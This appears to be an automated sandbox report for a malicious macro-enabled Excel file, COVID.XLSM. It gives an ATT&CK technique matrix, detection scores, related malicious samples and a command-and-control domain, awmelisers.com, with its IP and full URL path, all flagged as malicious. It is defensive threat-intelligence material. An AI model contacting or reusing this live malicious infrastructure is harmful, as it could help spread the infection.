Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter11Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
COVID.XLSM100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
awmelisers.com8%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://go.microsoft.co0%VirustotalBrowse
https://go.microsoft.co0%Avira URL Cloudsafe
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis8%VirustotalBrowse
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://awmelisers.com8%VirustotalBrowse
https://awmelisers.com0%Avira URL Cloudsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
awmelisers.com
206.81.23.172
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
    high
    https://login.microsoftonline.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
      high
      https://shell.suite.office.com:1443BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
          high
          https://go.microsoft.copowershell.exe, 00000006.00000002.728979309.000002E1FAEBD000.00000004.00000001.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://autodiscover-s.outlook.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
            high
            https://roaming.edog.BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
              high
              https://cdn.entity.BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                    high
                    https://powerlift.acompli.netBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                      high
                      https://cortana.aiBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                high
                                https://api.aadrm.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                      high
                                      https://cr.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                        high
                                        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmpfalse
                                              high
                                              https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreispowershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmptrue
                                              • 8%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://graph.ppe.windows.netBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://go.micropowershell.exe, 00000006.00000002.725312158.000002E1E45EF000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplateBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetectBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.msBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                high
                                                                https://graph.windows.netBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://officesetup.getmicrosoftkey.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/apiBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetectBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://awmelisers.compowershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmp, PowerShell_transcript.675052.5LFBxafq.20210826072919.txt.6.drtrue
                                                                      • 8%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                            high
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                              high
                                                                              https://ncus.contentsync.BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                  high
                                                                                  http://weather.service.msn.com/data.aspxBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                    high
                                                                                    https://apis.live.net/v5.0/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                      high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                          high
                                                                                          https://management.azure.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                            high
                                                                                            https://wus2.contentsync.BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://incidents.diagnostics.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                              high
                                                                                              https://clients.config.office.net/user/v1.0/iosBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                high
                                                                                                https://insertmedia.bing.office.net/odc/insertmediaBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                  high
                                                                                                  https://o365auditrealtimeingestion.manage.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                    high
                                                                                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                      high
                                                                                                      https://api.office.netBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                        high
                                                                                                        https://incidents.diagnosticssdf.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                          high
                                                                                                          https://asgsmsproxyapi.azurewebsites.net/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                            high
                                                                                                            https://entitlement.diagnostics.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                              high
                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                high
                                                                                                                https://substrate.office.com/search/api/v2/initBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                    high
                                                                                                                    https://storage.live.com/clientlogs/uploadlocationBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                        high
                                                                                                                        https://webshell.suite.office.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                          high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                            high
                                                                                                                            https://substrate.office.com/search/api/v1/SearchHistoryBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                              high
                                                                                                                              https://contoso.com/powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://management.azure.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorizeBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://graph.windows.net/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://api.powerbi.com/beta/myorg/importsBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://devnull.onenote.comBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://ncus.pagecontentsync.BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonBF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://messaging.office.com/BF4B57C3-D181-4204-9680-790D8457BA20.0.drfalse
                                                                                                                                            high

                                                                                                                                            Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            206.81.23.172
                                                                                                                                            awmelisers.comUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue

                                                                                                                                            Private

                                                                                                                                            IP
                                                                                                                                            192.168.2.1

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                            Analysis ID:471900
                                                                                                                                            Start date:26.08.2021
                                                                                                                                            Start time:07:28:08
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 5m 17s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Sample file name:COVID.XLSM
                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                            Number of analysed new started processes analysed:21
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal84.expl.evad.winXLSM@6/7@1/2
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:Failed
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 77%
                                                                                                                                            • Number of executed functions: 20
                                                                                                                                            • Number of non-executed functions: 2
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Found application associated with file extension: .XLSM
                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                            • Attach to Office via COM
                                                                                                                                            • Scroll down
                                                                                                                                            • Close Viewer
                                                                                                                                            Warnings:
                                                                                                                                            Show All
                                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.50.102.62, 23.211.6.115, 52.109.88.177, 52.109.8.22, 52.109.76.33, 20.82.210.154, 20.54.110.249, 40.112.88.60, 20.82.209.183, 80.67.82.211, 80.67.82.235
                                                                                                                                            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, config.officeapps.live.com, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            07:29:21API Interceptor38x Sleep call for process: powershell.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            206.81.23.172COVID.XLSMGet hashmaliciousBrowse

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              awmelisers.comcobaltocyanic.exeGet hashmaliciousBrowse
                                                                                                                                              • 142.93.102.244

                                                                                                                                              ASN

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              DIGITALOCEAN-ASNUSCOVID.XLSMGet hashmaliciousBrowse
                                                                                                                                              • 206.81.23.172
                                                                                                                                              Scan-System.exeGet hashmaliciousBrowse
                                                                                                                                              • 157.245.3.101
                                                                                                                                              Scan-System.exeGet hashmaliciousBrowse
                                                                                                                                              • 157.245.3.101
                                                                                                                                              ziprar.exeGet hashmaliciousBrowse
                                                                                                                                              • 45.55.57.132
                                                                                                                                              j777bHTnC9.docGet hashmaliciousBrowse
                                                                                                                                              • 138.68.30.186
                                                                                                                                              j777bHTnC9.docGet hashmaliciousBrowse
                                                                                                                                              • 138.68.30.186
                                                                                                                                              EoY_TAX_Document-73785947_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 139.59.64.195
                                                                                                                                              EoY_TAX_Notificaion-9134_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 139.59.64.195
                                                                                                                                              EoY_TAX_Export-6179_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 134.209.205.181
                                                                                                                                              EoY_TAX_Document-3364_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 134.209.205.181
                                                                                                                                              EoY_TAX_Export-15218_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 139.59.64.195
                                                                                                                                              EoY_TAX_Document-8652654913_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 139.59.64.195
                                                                                                                                              EoY_TAX_Export-626671470_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 139.59.64.195
                                                                                                                                              EoY_TAX_Document-249607367_20210823.xlsbGet hashmaliciousBrowse
                                                                                                                                              • 139.59.64.195
                                                                                                                                              NMlnVly7uvGet hashmaliciousBrowse
                                                                                                                                              • 164.90.252.215
                                                                                                                                              VvamA82Yw7.docGet hashmaliciousBrowse
                                                                                                                                              • 67.205.158.47
                                                                                                                                              VvamA82Yw7.docGet hashmaliciousBrowse
                                                                                                                                              • 67.205.158.47
                                                                                                                                              tiS0LFl5Cd.exeGet hashmaliciousBrowse
                                                                                                                                              • 167.172.146.76
                                                                                                                                              n038rUglDh.exeGet hashmaliciousBrowse
                                                                                                                                              • 142.93.237.125
                                                                                                                                              VXS0UU2rgK.exeGet hashmaliciousBrowse
                                                                                                                                              • 134.209.79.108

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BF4B57C3-D181-4204-9680-790D8457BA20
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):136730
                                                                                                                                              Entropy (8bit):5.361398094844069
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:qcQIKNveBQA3gBwbnQ9DQW+z2Y34ZliKWXboOidXqE6LWME9:+CQ9DQW+zaX31
                                                                                                                                              MD5:C2A7D3D122F512DFD2CBB9CB5CCEBB3C
                                                                                                                                              SHA1:5DE10CDD2E4A94CD89D7F73B625704FEAE8285F2
                                                                                                                                              SHA-256:3D1BA3F94CDFE34D999F2A5B7C6B194234615486A9ADAF8479A7C36758DD5D33
                                                                                                                                              SHA-512:AE6EE8A2A2BED5F2F0AA529D1F82C099EB1EFD024E8C958354A2F21576E0AC7D1E1284D01F83444D354ACDD802DF0B3E14FA9125CD737C04304C9FBD5A2B1BB8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-08-26T05:29:08">.. Build: 16.0.14416.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3357C4D0.png
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:PNG image data, 858 x 377, 8-bit colormap, non-interlaced
                                                                                                                                              Category:dropped
